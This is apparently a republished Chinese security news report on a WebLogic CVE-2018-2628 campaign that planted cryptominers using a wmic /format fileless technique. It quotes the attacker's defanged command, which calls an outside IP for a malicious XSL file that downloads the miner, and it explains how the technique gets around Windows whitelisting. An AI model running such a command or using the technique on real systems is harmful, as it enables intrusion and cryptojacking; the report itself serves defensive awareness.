您的位置:首页 >鉴藏 > 陶瓷 >

对抗杀软!黑客使用新技术植入挖矿木马

2022-03-15 06:17:03 来源:

  360互联网安全中心监控到有黑客团伙于今日凌晨对暴露在互联网中的Weblogic服务端发起大规模攻击。该黑客团伙使用Weblogic远程代码执行漏洞cve-2018-2628攻击服务器,并利用最新攻击技术试图向服务器中植入挖矿木马。

  攻击仅仅持续五分钟,受害服务器却超50台

  根据360互联网安全中心所监控到的情况,攻击开始于凌晨1点18分,结束于凌晨1点23分,持续时间只有五分钟。然而在这短短5分钟内,由于之前未对Weblogic服务端进行更新而遭到入侵的服务器数量超过50台。由于360安全卫士有效拦截其进一步攻击,黑客在1点23分之后停止攻击。图1展示了今日凌晨的攻击走势。

  黑客使用最新无文件攻击技术对抗杀毒软件

  黑客入侵服务器成功后,会执行如下命令:wmic os get /format!hxxp!//149。28。76。165/host。xsl。该命令源于国外安全研究员Casey Smith在4月18日发现的最新无文件攻击技术(,可用于绕过Windows白名单限制。

  wmic是WMI命令行,可以用来管理、操作WMI系统。用户能够通过wmic [wmicomand] /format:[filename]将wmi命令行的输出格式化到指定的xsl文件或者csv文件中。由于wmic设计上的逻辑错误,在将输出格式化到xsl文件中时可能导致xsl文件中嵌入的脚本代码被执行,该利用思路与regsvr32执行sct文件中的脚本代码类似,可被用于绕过Windows白名单执行恶意代码。此外,xsl文件也可以被托管在远程服务器上,因此黑客可以利用wmic实现无文件攻击。图2展示hxxp!//149。28。76。165/host。xsl内容,不难发现该xsl文件中嵌入恶意的js脚本代码,这段脚本代码将从hxxp!//149。28。76。165/winmine。exe下载挖矿木马到服务器中进行挖矿。

hxxp!//149。28。76。165/host。xsl的内容

  由于杀毒软件对一些经常被用于无文件攻击的白文件(例如:PowerShell。exe,Regsvr32。exe)进行了封锁,黑客急需一个新的替代品实现无文件攻击,而wmic正好能够胜任这项工作。自从这项攻击技术问世以来,利用这项技术完成执行的攻击时有发生,本次攻击是该攻击技术第一次被大规模使用。

  360安全卫士早已对此攻击方式进行拦截

  这项攻击技术问世之后,360安全卫士就及时对其进行拦截,使用360安全卫士的用户完全不必担心。

相关阅读
热门新闻
对抗杀软!黑客使用新技术植入挖矿木马

对抗杀软!黑客使用新技术植入挖矿木马

  360互联网安全中心监控到有黑客团伙于今日凌晨对暴露在互联网中的Weblogic服务端发起大规模攻击。该黑客团伙使用Weblogic远程代码执行漏洞

2022-03-15 06:17
干细胞疗法恢复帕金森病猴神经功能有望治疗人类

干细胞疗法恢复帕金森病猴神经功能有望治疗人类

   (原标题:干细胞疗法恢复帕金森病猴神经功能)     科技日报北京8月30日电(记者张梦然)英国《自然》杂志29日发表一项重要成果:

2022-03-15 05:36
智能手机硬盘,解决黄金周出游照片备份问题

智能手机硬盘,解决黄金周出游照片备份问题

  国庆黄金周即将来临,让大把的人都有时间逃离繁忙的工作,好好享受一场七天的度假旅行。旅行中我们总是喜欢把最美的自己和风景留在数码

2022-03-15 04:22
聚美优品八周年打造最受消费者信赖的新模式—专柜购

聚美优品八周年打造最受消费者信赖的新模式—专柜购

  长久以来,在消费者的潜在认知中,专柜相比其他线上虚拟平台提供的货源而言信任度更高,因为线下实体店无论在体验、试用,还是售后服务

2022-03-15 03:31
SENSORCHINA2018圆满闭幕

SENSORCHINA2018圆满闭幕

  由工业和信息化部和上海市科委作为指导单位,中国传感器与物联网产业联盟(SIA)和上海科技会展有限公司共同主办,国家智能传感器创新中

2022-03-15 02:01
AR导航技术新应用帮助医生进行外科手术

AR导航技术新应用帮助医生进行外科手术

    【网易智能讯1月14日消息】据国外媒体报道,作为集成式影像导引治疗解决方案提供商,飞利浦公司宣布开发增强现实手术导航技术。该

2022-03-15 01:29